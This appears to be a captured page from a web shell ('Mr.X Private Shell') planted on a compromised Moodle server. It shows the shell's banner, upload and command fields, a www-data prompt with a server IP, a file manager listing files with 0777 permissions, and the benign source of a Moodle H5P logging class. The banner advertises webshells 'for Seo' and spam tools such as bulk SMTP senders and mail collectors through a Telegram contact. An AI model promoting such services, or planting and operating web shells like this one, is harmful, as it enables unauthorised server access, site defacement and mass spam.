__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace mod_h5pactivity\external;

use core_external\external_api;
use core_external\external_function_parameters;
use core_external\external_single_structure;
use core_external\external_value;
use core_external\external_warnings;
use mod_h5pactivity\local\manager;
use mod_h5pactivity\event\report_viewed;
use context_module;
use stdClass;

/**
 * This is the external method for logging that the h5pactivity was viewed.
 *
 * @package    mod_h5pactivity
 * @copyright  2021 Ilya Tregubov <ilya@moodle.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 * @since      Moodle 3.11
 */
class log_report_viewed extends external_api {

    /**
     * Webservice parameters.
     *
     * @return external_function_parameters
     */
    public static function execute_parameters(): external_function_parameters {
        return new external_function_parameters(
            [
                'h5pactivityid' => new external_value(PARAM_INT, 'h5p activity instance id'),
                'userid' => new external_value(
                    PARAM_INT,
                    'The user id to log attempt (null means only current user)',
                    VALUE_DEFAULT
                ),
                'attemptid' => new external_value(PARAM_INT, 'The attempt id', VALUE_DEFAULT),
            ]
        );
    }

    /**
     * Logs that the h5pactivity was viewed.
     *
     * @throws  moodle_exception if the user cannot see the report
     * @param  int $h5pactivityid The h5p activity id
     * @param  int|null $userid The user id
     * @param  int|null $attemptid The attempt id
     * @return array of warnings and status result
     */
    public static function execute(int $h5pactivityid, ?int $userid = null, ?int $attemptid = null): stdClass {
        $params = external_api::validate_parameters(self::execute_parameters(), [
            'h5pactivityid' => $h5pactivityid,
            'userid' => $userid,
            'attemptid' => $attemptid,
        ]);
        $h5pactivityid = $params['h5pactivityid'];
        $userid = $params['userid'];
        $attemptid = $params['attemptid'];

        // Request and permission validation.
        list ($course, $cm) = get_course_and_cm_from_instance($h5pactivityid, 'h5pactivity');

        $context = context_module::instance($cm->id);
        self::validate_context($context);

        $manager = manager::create_from_coursemodule($cm);

        $instance = $manager->get_instance();

        // Trigger event.
        $other = [
            'instanceid' => $instance->id,
            'userid' => $userid,
            'attemptid' => $attemptid,
        ];
        $event = report_viewed::create([
            'objectid' => $instance->id,
            'context' => $context,
            'other' => $other,
        ]);
        $event->trigger();

        $result = (object)[
            'status' => true,
            'warnings' => [],
        ];

        return $result;
    }

    /**
     * Describes the report_viewed return value.
     *
     * @return external_single_structure
     * @since Moodle 3.11
     */
    public static function execute_returns() {
        return new external_single_structure(
            [
                'status' => new external_value(PARAM_BOOL, 'status: true if success'),
                'warnings' => new external_warnings()
            ]
        );
    }
}

Filemanager

Name Type Size Permission Actions
get_attempts.php File 8.58 KB 0777
get_h5pactivities_by_courses.php File 5.14 KB 0777
get_h5pactivity_access_information.php File 3.85 KB 0777
get_results.php File 12.66 KB 0777
get_user_attempts.php File 11.44 KB 0777
h5pactivity_summary_exporter.php File 7.99 KB 0777
log_report_viewed.php File 3.98 KB 0777
view_h5pactivity.php File 3 KB 0777
Filemanager